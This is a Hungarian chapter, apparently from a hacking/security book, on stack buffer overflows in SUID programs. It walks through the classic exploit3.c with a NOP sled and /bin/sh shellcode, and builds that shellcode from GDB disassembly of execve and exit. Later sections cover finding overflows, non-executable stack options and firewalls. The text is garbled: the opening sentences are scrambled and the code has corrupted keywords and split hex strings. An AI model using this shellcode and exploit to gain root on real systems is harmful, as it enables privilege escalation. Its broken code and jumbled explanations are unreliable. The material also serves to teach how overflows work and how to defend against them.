Ez főleg a SUID-programoknál érdekes. a tulajdonképpeni Buffer-Overflow-t. hogy miért kell egyáltalán root-jogokkal futniuk a programoknak. //ezért az utána elhelyezkedő terület felülíródik strcpy(ToLittle. csak hogy megszerezzék a nekik szükséges helyet. amely már nem ehhez a pufferhez. Ha minden felhasználó root-jogokkal tud programokat futtatni. amelyek arra valók. Azonban bizonyos bevitelekkel még végre lehet hajtatni egy kódot az instabil rendszeren. OverFlow (To Great) } //Most jön a függvény. Ha a támadó kapcsolatot épít fel a hosttal. hogyan nem íródnak felül válogatás nélküli tetszőleges programrészek. amíg az megtelik.különben nem fog menni. hiszen rootként futó eljárások csak olyanok lehetnek. természetesen megnő a lehetséges hibaforrások száma. 11.2. . akkor csak annyit kell tennie. úgynevezett kizsákmányoló (exploit) kód van. A biztos eredmény: memóriavédelmi hiba és a program összeomlása. A ping egy jó példa az olyan programra. Sok. és végül a program hibás működését. amit átadtak charTolittle[16] //megpróbálja 256 bájttal teleírni a puffért. A shell-kód értelme és célja. string). } 11. Ezzel át lehet venni az ellenőrzést a számítógép felett. i < 255. hogy addig ír a pufferba. amely a tulajdonképpeni hibát okozza void Overflow(char *string) { //A puffer kisebb. Talán felmerül a kérdés.2. végül rátesz még egy lapáttal. i++) { large_string[i] = 'A'. az lefagy.adatmennyiség kilóg a pufferből egy olyan területre. hogy egy shellt (parancssort) nyissanak root-jogokkal a rendszeren. hogy a program a tulajdonos és nem a felhasználó jogaival fut. hanem más változókhoz tartozik. amely arra kényszeríti a programot. ami azt jelenti. A kivitelezéshez szükséges programok (GCC=GNU C Compiler. amelyek a roothoz tartoznak. s hogyan lehet célzottan megváltoztatni a függvény visszatérési pontjának a címét. mint a ToGreat változó. Világos. GDB=GNU Debugger) futtatásához még Linux is kell. hogy ez fusson a főprogram helyett. hogy egy ilyen program biztonsági kockázatot jelenthet. amit ott találnak. de minden felhasználó elindíthatja.és Shellscript-ismeretekre van szükség . amely A-kkal tölti ki a memóriaterületet for(i = 0. és . amelyek már bootoláskor elindulnak. és egy hosszú karakterláncot küld egy meghatározott programnak. Egy példa az ilyen kódra: voidman( ) { //a ToGreat változót 256 bájttal inicializálja char ToGreat[256] //ciklusváltozó int i. hogy egy Buffer-Overflow segítségével „megörököljenek" egy root-jogokkal rendelkező shellt.1 Hogyan lehet ezt kihasználni? Ha a támadó Buffer-Overflow-val akar lefagyasztani egy programot. holott csak 16 bájtra volna lehetőség.2 Hogyan működik? Shell-kód alatt olyan assembler-kódot értünk. A továbbiak megértéséhez alapos assembler. Itt a támadók különösen abban érdekeltek. Ennek a következő a háttere: egyes funkciók. ami root-jogokkal fut. mint a raw sockets vagy bizonyos rendszererőforrások elérése. amikor a program egy eljárásból vagy függvényből visszatér. Ez egy SUID bitet helyez el. Ez természetesen hibákat eredményez. Eközben az adatok mindent felülírnak. //egy ciklus. hogy egy shellt hozzon létre. például az 1024 alatti portoké vagy eszközöké. root-jogokat követel meg. Forráskódokkal mutatjuk meg.

i+=4) *(addr_ptr++) = addr. ptr = buff. unsigned long get_sp(void) { asm("movl%esp.%eax"). *ptr. addr). cbar shettcode[ ] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\ x40\xcd" "\x80\xe8\xdc\xff\xff\xff\bin/sh". } A „get_sp" változó feltöltése assembler-kóddal} mid main(int argc. for (i = 0. Ezért nagyon pontosan meg kell becsülni. Természetesen a támadók több NOP-kódot is beépítenek. } memcpy(buff. long *addr:ptr. system("/bin/bash "). exit(0). i++) buff[i] = NOP. mert még nem ismerjük a shellkód helyét a memóriában. addr. for(i = 0. A NOP-kódokat a pufferméret feléig írjuk a memóriába. int offset=DEFAULT_OFFSET. } Olyan fogalmakkal lehet dolgozni. ptr = buff+ ((bsize/2) . int i.(strlen(shellcode)/2)).offset. Kiírja a „Using address: 0x%x\n" -t és az „addr" értékét. hogy a kód. i < bsize/2.Magyarázatképpen egy forráskód: exploit3.1000 NOP kód. \n"). Pointer az „addr-ptr" helyére. A „ptr" megfelel a „bufF"-nak addr_ptr = (long *) ptr. mert az addr-ptr címét minden cikluslefutással növeljük. a pointer minden alkalommal egy bájttal tovább mutat. buff[bsize -1]= '\0'. Pointer a ptr címére for (i = 0. if (!(buff=malloc(bsize))) { printf("Can't allocate memory. dhar *argv[ ]) { char *buff. Beírjuk a shellkódokat a memóriába. i < bsize. A Shellcode változóhoz egy értéket rendelünk. i < strlen(shellcode). hogy eltaláljuk a megfelelőt. Ez a kód még nincs kész. Egy valódi exploitnál ez többnyire több mint 100 . hogy növeljék a találat esélyeit. if (argc > 2) offset = atoi(argv[2]). . azáltal. A változókhoz értéket rendel if (argc > 1) bsize = atoi(argv[1]). hogy a NOP-kód csak a Ox90-es Intel CPU-kon fut. Fontos még megemlíteni. mint a „DEFAULT_OFFSET".c #include #define DEFAULT_OFFSET #DEFAULT_BUFFER_SIZE #defineNOP addr = get_sp( ) . Most elhelyezzük az endbyte-ot. bsize=DEFAULT_BUFFER_SIZE. olvashatóbbá váljon. putenv(buff). a Shellcode csak a „bin/sh".4). i++) *(ptr++) = shellcode[i]."EGG=". Az „Offset" értéke 0 0 512 0x90 printf("Using address: 0x%x\n". hogy kevesebb számot használunk. a többi assembler.

3 Minek kell a Shellcode változónál állnia? Most már mindenképpen segítségül kell hívni egy GDB-t! shellcode.2. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+l>: movl %esp.0xfffffffc(%ebp) 0x8000144: pushl $0x0 0x8000146 leal 0xfffffff8(%ebp). A parancs így néz ki: gcc -o shellcode -ggdb -static shellcode. %esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump. és másolatot is lehet róla készíteni! (gdb) disassemble main Dump of assembler code for function main: 0x8000130: pushl %ebp 0x8000131: movl %esp. NLL). } Hogy megnézzük.%eax 0x800014d: pushl %eax 0x800014e: call 0x8002bc <__execve> 0x8000153: addl $0xc.0xfffffff(%ebp) 0x800013d: movl $0x0. name[0] = "/bin/sh". name[1] = NULL.%eax 0x8000149: pushl %eax 0x800014a: movl 0xfffffff8(%ebp).%edx 0x80002d2 <__execve+22>: movl %edx. először a „main"-t analizáljuk: 0x8000130: 0x8000131: 0x8000133: pushl movl subl %ebp %esp. execve(name[0].(%eax) 0x80002e1 <__execve+37>: movl $0xfffffffc.%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax.%esp Ez volt az eljárás kezdete.%esp 0x8000156: movl %ebp. Ehhez először a GCC-vel kell compilerelni a programot.%esp 0x8000158: popl %ebp 0x8000159: ret End of assembler dump.%esp 0x8000136: movl $0x80027b8.%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp).%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp).%ebp 0x8000133: subl $0x8. %ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb. A régi frame-pointert mentjük.c Most elindítjuk a GDB-t: gdb shellcode A GDB ingyenes szoftver.%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp. Hogy ezt megértsük. hogyan néz ki a forráskód assemblerben.%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp).c #include void main( ) { char *name[2]. name. és egy új frame-pointert állítunk elő. és GDB-vel elemezzük.%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <_execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x80001a34<__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx.11. Ebben az esetben: . amely szabad helyet készít a helyi változóknak.%ebp $0x8. elindítjuk.

hogy hozzáfűz egy exit syscall-t: exit. Most execve( ). A támadó egy ilyen programot természetesen megpróbál tisztán programozni. Beírja az instruction pointert a stackbe.. 0x8000144: pushl $0x0 Az execve( ) argumentumait fordított sorrendben helyezzük (push) a stackbe. %eax 0x8002bc <__execve> Beírjuk a stackbe a "/bin/sh" sztring címét. 0x8000136: Az eljárás kezdete movl $0x80027b8.0xfffffffc(%ebp) A 0x0 (NULL) értéket a második pointer of name[ ] -be másoljuk.%eax Beírjuk a name[ ] címét a stackbe. Minden folyamat az operációs rendszertől függ. De mi történik. Ez ugyanazt jelenti mint: name[1] = NULL.%ebp A 0x80027b8 értéket (a . 0x80002bc <__execve>: 0x80002bd <__execve+1>: movl 0x80002bf <__execve+3>: pushl %ebp %esp.%ebx 0xc(%ebp). ha félresikerül? A program végeérhetetlenül tovább hozná az értékeket a stackből.c #include void main( ) { exit(0). Ez ugyanazt jelenti mint: name[0]="/bin/sh".%edx $0x80 A 0xb-t a stackbe másoljuk. (gdb) disassemble_exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp. Kernel módra váltunk. Az execve( ) library eljárás meghívása.0xfffffff(%ebp) 0x80002c0 <__execve+4>: movl 0x80002c5 <__execve+9>: movl 0x80002c8 <__execve+12>: movl 0x80002cb <__execve+15>: movl 0x80002ce <__execve+18>: int $0xb. 0x8000149: 0x800014a: 0x800014d: 0x800014e: pushl call pushl %eax 0xfffffff8(%ebp). NULL-ával kezdünk.%ecx 0x10(%ebp). %ebp pushl %ebx . Az execve( ) meghívása itt kezdődik. 0x8000146: leal 0xfffffff8(%ebp). A "/bin/sh" címét bemásoljuk az EBX-be.c gdb exit (no debugging symbols found). A name [ ] címét bemásoljuk az ECX-be..%eax Betöltjük a name[ ] címét az EAX regiszterbe. Ezt úgy tudja elérni.char *name[2]. movl Betöltjük a "/bin/sh" sztring címét az EAX regiszterbe. A Null pointer címét az EDX-be másoljuk. 0x800013d: movl $0x0. 11 az execve./bin/sh" címe) bemásoljuk az első pointer of name[ ] -be. Tulajdonképpen ez minden az execve( ) meghívásáról. } gcc -o exit -static exit. Nem valami finom dolog. Ez az index a syscall-táblában. amelyek azután más értékeket tartalmazhatnának.%eax 0x8(%ebp).

%ebx int $0x80 call offset-to-popl /bin/sh string goes here.array-offset(%esi) # movb $0x0. Jump-pal és Call-lal olyan parancsokat lehet használni. a sztringcím lesz visszatérési címként megadva.%eax movl 0x8(%ebp). movl %esÍ. %eax movl string_addr.null_byte_addr movl $0x0. hogy pontosan hova kerül a memóriában az exploit kódunk. %eax movl $0x0.null_addr movl $0xb. %esp popl %ebp ret nop nop nop szünk. (%esi).string_addr_addr movb $0x0.%eax movl %esi. könnyítésképpen bizonyos parancsokat lehet használni. Mivel soha nem tudjuk pontosan. A J itt a Jump.nullbyteoffset(%esi) movl $0x0. %edx int $0x80 movl $0x1.%ecx leal null_string. %eax movl $0x0. A legtöbb program 0-t ad vissza. %ecx leal null-offiet(%esi).0x800034f <_exit+3>: 0x8000350 <_exit+4>: 0x8000355 <_exit+9>: 0x8000358 <_exit+12>: 0x800035a <_exit+14>: 0x800035d <_exit+ll>: 0x800035f <_exit+19>: 0x8000360 <_exit+20>: 0x8000361 <_exit+21>: 0x8000362 <_exit+22>: 0x8000363 <_exit+23>: End of assembler dump.%edx int $0x80 movl $0x1. és a C a Call helyett áll. amelyekkel relatív címeket kapunk. természetesen a sztring címét és az endbyte nullát a tömb mögé tesszük. mikor a hívás lefutott. Összefűzve ez a következőképpen néz ki: Elhelyezzük a sztringet a kód mögött. és ezután kell végrehajtani az „int 0x80"-at. %ebx leal string_addr.null-offset(%esi) movl $0xb. A programfutás a következőképpen néz ki: Az Exit syscall-t a 0xl-re helyezzük az EAX-ben. # 2 bytes # 1 byte 3 bytes # 4 bytes # 7 bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes . Ha a „/bin/sh" sztring elé egy Call parancsot teA programkód a módosításokat követően jmp offset-to-call popl %esi . Most már csak annyit kell tenni. %ebx leal array-offset. hogy a visszatérési címet bemásoljuk a regiszterbe. ez az exit kód. és a Call parancshoz egy Jump parancsot. ha nem volt hiba. %ebx int $0x80 /bin/sh string goes here.%ebx movl %ebp. movl string_addr.%ebx int $0+80 movl 0xfffffffc(%ebp). pushl %ebx movl $01.

egy null-terminálással megjelölt program végéig.4 Honnan lehet felismerni a Buffer-Overflow-t? Szerencsére sok lehetőség van a Buffer-Overflow-k felismerésére. %eax movl $0x0. ami pl. Sok operációs rendszer ezt megint csak nem engedi meg. amelynek megvan a forráskódja. mint a Stack Overflow-kat. Hogy kiderüljön. Ez persze véd a Stack Overflow-któl. ezt kapjuk: jmp 0x26 popl %esi jnovl %esi. egy fájlszegmensbe vagy stackbe kell csomagolni. mekkora a rendelkezésre . működik-e a kód. Lényegében a dinamikus hozzárendelés sem sokkal biztonságosabb. és ismét a GDB-t használni. Ezért a kódot. neki elég néhány könyvtárfunkciót használnia. Itt szisztematikusan ellenőrizni kell a paraméter-átadásokat és az egyes funkciókat (a DLL-eket és a library-ket). Az ilyen funkciókat a forráskódban a legegyszerűbb megkeresni. és máris jelentkeznek ezek a problémák. akkor nincs gond. Ha egy bevitel ellenőrzés nélkül. a user interfészen keresztül lehet váratlan bevitelekkel tesztelni a programot. a strcat( ). 11. hanem helyette malloc( ) -ot használnak. az ismert bizonytalansági faktorokra. amely elolvas és a pufferbe ír egyes karaktereket.0xc(%esi) movl $0xb. egy kis példa: void tulcsordul(char argvFG) { char BuffertoLittle [4]. hogy túl lehet tölteni a puffért. ezért ritkábban is találkozni az előbbiekkel.0x8(%esi) movb $0x0. íme. a sztringcímről tömbre és a sztringcímet nullára számoljuk át. A sztring azonban lehet túl hosszú. közvetlenül a Strcpy-val kerül használatba. hogy egy puffért bevitelekkel megtöltsünk. A parancsok egyszerűen egy null-karakterig (\0) olvasnak. a gets( ). Először azonban a bináris kód hexmegjelenítéséhez kell jutnunk. s a programozók sem nagyon védik ettől a programjaikat. ami természetesen egy fatális programozási hiba.%eax movl %esi. Ha nincs ilyen lehetőség (nincs meg a forráskód). ezzel minden veszélytől védve vannak. de nem a Heap-based Overflow-któl. %ebx leal 0x8(%esi).%edx int $0x80 movl $0x1.Ha az offseteket Jump-ról Call-ra. és a \0 jóval a puffer vége után is elhelyezkedhet. A programozók úgy gondolják.0x7 (%esi) movl $0x0.%ecx leal 0xc(%esi). Ha olyan programról van szó. A másik eljárás arra.3 Áldozat a Buffer-Overflow-kért Ezekhez a támadásokhoz tehát egy pufferra van szükség. a vprintf( ). ami attól függ. A hiba azonban többnyire nem a programozón múlik. hogy soha nem statikus puffereket. 11. Ilyenkor többnyire a sztringhosszúságot figyeljük az átadási pontokon. Linuxprogramoknál szabadon hozzáférhető. Hogy ezt elérjük. a strcpy( ) és a scanf( ) nem figyelnek arra. és azután teszteljük. logikus. a sprintf( ). Call-ról Popl-ra. Mik azok a Heap-based Overflow-k? Heap-based Overflow-kat sokkal nehezebb előállítani. és ezután a transzferkontrollt kell használni. Hozzáértő hackereknek tehát ez egy egészen különleges támadási pont! A gond az. A könyvtárfüggvények tartalmazta parancsok. Ha ez kész. hogy mi áll hozzá a rendelkezésünkre. és hibákat keresünk. akkor lehet mindent compilerelni. De van egy probléma! Ez a kód sajátosan változik. a kódot egy globális tömbbe helyezzük a fájlszegmensben. %ebx int $0x80 call 0x2b string \"/bin/sh\" # 2 bytes # l byte # 3 bytes # 4 bytes # l bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes #8 bytes álló puffer. amelyet futtatunk. először a compilerrel lefordítjuk. egy ciklus. amelyhez a vége után is hozzá tudunk írni.

Itt az átadandó paraméternek olyan a hossza. és utána végrehajtani vagy */ /* mindjárt biztonságos függvényeket használni */ Természetesen más módszerek is vannak. A Solaris 2. tulcsordul(argv[1]). Egy programot lehet pl. hogy a „heap"-ben és a „stack"-ben programok futhassanak (noexec_user_stack. A felderítés egyik lehetősége lenne a szerver lekapcsolása. hogy a shellneveket és az /etc/passwd-fájlt megfelelően megváltoztassuk. Megmutatja. } 11. strcpy(BuffertoLittel. } /* Helyes: ahogy a felső részben. ha a felhasználói privilégiumokat nem használják ki túlságosan. mielőtt a hacker törölhetné a nyomait a logfájlokból. noexec_user_heap). argv). Ez akkor segíthet." A demonstráláshoz egyszerűen le kellene fordítani ezt a programot. argv). Itt nem a forráskód a fontos. Ha egy kifelé nyitott hálózati szolgáltatóról van szó. ha egyszer már megleptek. mint azt a programozó várta. Ahogy az előbbiekben. és egy speciális compilerrel minden programot újra kell fordítani. amelynél a parancsokat és a szintaxist is meg lehet tudni. hanem egy manuálisan előidézett BufferOverflow demonstrálása. honnan jönnek az adatok. Ezáltal a Solarissal kapott programok. Ezért érvényes a régi szabály: „Minél jobban eltérsz a szabványosított megnevezésektől. és a reakcióra várni. hogy az összedöntí a programot. Ha ez megtörténik. mert a beírás hosszabb volt. Különösen. disassemblálni. a támadó többé nem tud mit kezdeni ezzel a számítógéppel. először ellenőrizni. és az egész Linuxot kompletten át lehet írni. A SecureLINUX-nál egy patch-re van szükség ehhez. A hacker célja mindig az. itt is szándékosan túl hosszú beviteleket kell csinálni. ami megakadályozza. Ezt indítja el az exploiton keresztül is. A névadási kényszer miatt ez a variáció szinte mindig sikeres. akkor a Netcattel egyenként lehet ellenőrizni a parancsokat a Buffer-Overflow-ra. annál nehezebb lesz a támadás. és a következőképpen elindítani: „Név 052698541". Így a fenti példa szerinti Buffer-Overflow természetesen nem sikerülhet. hajtsd végre\n". A standard kernelt kell megváltoztatni. a SecureLINUX és a Solaris 2. és részletről részletre átvizsgálni. hogyan lehet paraméterekkel és más átadásokkal (ezek más helyeken is történhetnek) szándékosan lefagyasztani programokat. . Honnan ismerünk fel egy Buffer-Overflow-támadást? A Buffer-Overflow-támadásokat nagyon nehéz felfedezni. „PZK" túlfut */ } int main(int argc. De felhasználóként vagy rendszergazdaként megvan még az a lehetőségünk is. hogy egy rootshell-hez jusson egy másik Linux-gépen.6+ védenek. /*Rossz: Ha argc[ ] túl nagy. Így már a hálózat felügyeletével is fel lehet ismerni. } eke { cout « "Bevitel OK. char *argv[ ]) { cout« "Az átadandó paraméter hossza:" « strlen (argvF1G) « "\n". pl.5 Milyen védelmi mechanizmusok vannak? Tulajdonképpen csak egy Linux-verzió. bevitelekkel tesztelni a Buffer-Overflow lehetőségeket. úgy kell ezt */ /* csinálni. nincsenek veszélyben. a „root"-ot lehet egyszerűen így nevezni: „HAHA". illetve védhetnek bizonyos mértékig e támadások ellen. vagyis manuálisan. vagy váratlan karakterekkel feltölteni.if (strlen(argv) > 7) { cout« "Rossz: a puffer túl fog csordulni\n".6+ nál a „normál" telepítés után aktiválni lehet egy kapcsolót. ha minden program forráskódja megvan. strcpy(BuffertoLittle.

Mivel a tűzfalak szinte mindig viszonylag kicsik. router. Konfliktusok abból adódhatnak.2 A Buffer-Overflow-k és a tűzfalak Egy tűzfallal természetesen csökkenteni lehet a Buffer-Overfíowtámadások lehetőségét. ha a szervernek még más feladatokat is el kell látnia.1 Összefüggés a CPU és a Buffer-Overflow között Manapság sok szervert működtetnek a kereskedelemben nem szokásos CPU-kkal. nem fognak bennük kiindulási pontot találni Buffer-Overflow-khoz. hogy egy készre fordított exploit jelenik meg az interneten. pl. Ezáltal a támadót vissza lehet fordítani az assembler-kód irányába.5. e-mail gateway. Így a tapasztalatlan támadóknak aligha van esélyük. proxy. . illetve a belső interfészek megtámadását. HTTP-szerver vagy adatbázis szerverként működik. Ezek nagy biztonsági kockázatot jelentenek. 11.5. A tűzfal megnehezíti a külső. és csökken annak a kockázata. Teljes biztonságban azonban sohasem érezhetjük magunkat.11.

Sign up to vote on this title
UsefulNot useful